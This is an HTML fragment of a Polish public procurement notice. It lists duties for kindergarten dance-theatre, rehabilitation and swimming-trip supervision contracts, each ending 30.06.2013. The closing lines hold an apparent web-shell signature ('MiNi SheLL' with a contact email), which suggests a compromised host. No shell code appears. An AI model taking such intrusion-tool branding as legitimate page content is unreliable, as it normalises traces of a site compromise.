10. Dokumentowanie podejmowanych  działań;
11. Współpraca z kadrą zarządzającą projektem oraz dyrektorem i kadrą pedagogiczną przedszkola;
12.Stosowanie się do zakresu zadań wyszczególnionych w umowie i regulaminów obowiązujących w przedszkolu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zajęcia taneczno-teatralne prowadzone przez nauczyciela - ilość godzin 80..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zakresu obowiązków nauczyciela prowadzącego zajęcia taneczno-teatralne należy:
1.	Rozbudzenie w dzieciach poczucia rytmu i koordynacji ruchowej, odpowiednio dla danej grupy;
2.	Poznanie gatunków tańca, jego historii oraz strojów i elementów;
3.	Poznanie różnych układów choreograficznych i ich zastosowanie w praktyce;
4.	Poznanie świata teatru, rekwizytów, charakteryzacji, kostiumów oraz prawdziwych lalek
       i ulubionych bohaterów teatralnych;
5.	Angażowanie dzieci do ról indywidualnych i grupowych;
6.	Współpraca z nauczycielami przedszkola w celu dostosowania realizowanych treści 
do możliwości dzieci;
7.	Prowadzenie obowiązującej dokumentacji (dziennik zajęć indywidualnych, kontakty z rodzicami;
8.	Przestrzeganie Statutu Przedszkola Samorządowego, regulaminów oraz procedur obowiązujących w przedszkolu,
9.   Ścisła współpraca z nauczycielami pracującymi z dziećmi w przedszkolu;
10. Dokumentowanie podejmowanych  działań;
11. Współpraca z kadrą zarządzającą projektem oraz dyrektorem i kadrą pedagogiczną przedszkola;
12. Stosowanie się do zakresu zadań wyszczególnionych w umowie i regulaminów obowiązujących w przedszkolu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zajęcia rehabilitacyjne prowadzone przez specjalistę - ilość godzin 80..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zakresu obowiązków specjalisty prowadzącego zajęcia rehabilitacyjne należy:
1.	Objęcie opieką rehabilitacyjną  wyznaczonych dzieci i prowadzenie zajęć w przedszkolu;
2.	Systematyczne prowadzenie zajęć rehabilitacyjnych w grupie;
3.	Prowadzenie terapii czuciowo - ruchowej oraz intelektualnej;
4.	Dążenie do poprawy kondycji dziecka ze szczególnym uwzględnieniem żywienia i oddychania;
5.	Współpraca z rodzicami, prowadzenie zajęć z udziałem rodziców, w celu demonstrowania ćwiczeń i ustalenie z nimi indywidualnego zestawu ćwiczeń dla każdego dziecka;
6.	Prowadzenie doradztwa rehabilitacyjnego;
7.	Prowadzenie warsztatów logopedycznych dla nauczycieli, rodziców i dzieci;
8.	Współpraca z nauczycielami przedszkola w celu dostosowania realizowanych zajęć rehabilitacyjnych do możliwości każdego dziecka;
9.	Prowadzenie obowiązującej dokumentacji (dziennik zajęć indywidualnych, obserwacje dzieci, kontakty z rodzicami;
10.	Systematyczne wzbogacanie wiedzy z zakresu rehabilitacji;
11.	Wprowadzanie pisemnych metod pracy z dziećmi i rodzicami/opiekunami prawnymi.
12. Przestrzeganie Statutu Przedszkola Samorządowego, regulaminów oraz procedur obowiązujących w przedszkolu,
13. 	Ścisła współpraca z nauczycielami pracującymi z dziećmi w przedszkolu;
14. 	Współpraca z kadrą zarządzającą projektem oraz dyrektorem i kadrą pedagogiczną przedszkola;
15.	Stosowanie się do zakresu zadań wyszczególnionych w umowie i regulaminów obowiązujących w przedszkolu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> opieka sprawowana przez nauczyciela podczas wyjazdów dzieci na basen -  4 wyjazdy w miesiącu przez 5 miesięcy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zakresu obowiązków osób zatrudnionych w charakterze opiekunów dzieci należy:
1.	sprawowanie opieki nad przedszkolakami podczas wyjazdu na basen:
a)	systematyczne liczenie przedszkolaków przed wyruszeniem z każdego miejsca, po przybyciu do celu, dostosowanie tempa i odległości odcinków na trasie do wydolności najsłabszego dziecka),
b) współdziałanie z kierownikiem w zakresie realizacji programu wyjazdu na basen;
c) nadzór nad przestrzeganiem zasad zachowania na basenie;
d) nadzór nad przestrzeganiem przez przedszkolaków zasad bezpieczeństwa i dyscypliny;
e) nadzór nad wykonywaniem przez przedszkolaków określonych zachowań i reakcji na umówione sygnały;
f) zapewnienie dzieciom bezpiecznego przejścia z pojazdu, do pojazdu, przy wsiadaniu, przy wysiadaniu,
g) nadzorowanie bezpieczeństwa podczas jazdy,
2. ścisła współpraca z nauczycielami pracującymi z dziećmi w przedszkolu;
3. dokumentowanie podejmowanych  działań;
4. współpraca z kadrą zarządzającą projektem oraz dyrektorem i kadrą pedagogiczną przedszkola;
5. stosowanie się do zakresu zadań wyszczególnionych w umowie i regulaminów obowiązujących w przedszkolu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> opieka sprawowana przez nauczyciela podczas wyjazdów dzieci na basen -  4 wyjazdy w miesiącu przez 5 miesięcy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zakresu obowiązków osób zatrudnionych w charakterze opiekunów dzieci należy:

1.	Sprawowanie opieki nad przedszkolakami podczas wyjazdu na basen:
a)	systematyczne liczenie przedszkolaków przed wyruszeniem z każdego miejsca, po przybyciu do celu, dostosowanie tempa i odległości odcinków na trasie do wydolności najsłabszego dziecka),
b) współdziałanie z kierownikiem w zakresie realizacji programu wyjazdu na basen;
c) nadzór nad przestrzeganiem zasad zachowania na basenie;
d) nadzór nad przestrzeganiem przez przedszkolaków zasad bezpieczeństwa i dyscypliny;
e) nadzór nad wykonywaniem przez przedszkolaków określonych zachowań i reakcji na umówione sygnały;
f) zapewnienie dzieciom bezpiecznego przejścia z pojazdu, do pojazdu, przy wsiadaniu, przy wysiadaniu,
g) nadzorowanie bezpieczeństwa podczas jazdy,
2. Ścisła współpraca z nauczycielami pracującymi z dziećmi w przedszkolu;
3. Dokumentowanie podejmowanych  działań;
4. Współpraca z kadrą zarządzającą projektem oraz dyrektorem i kadrą pedagogiczną przedszkola;
5. Stosowanie się do zakresu zadań wyszczególnionych w umowie i regulaminów obowiązujących w przedszkolu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com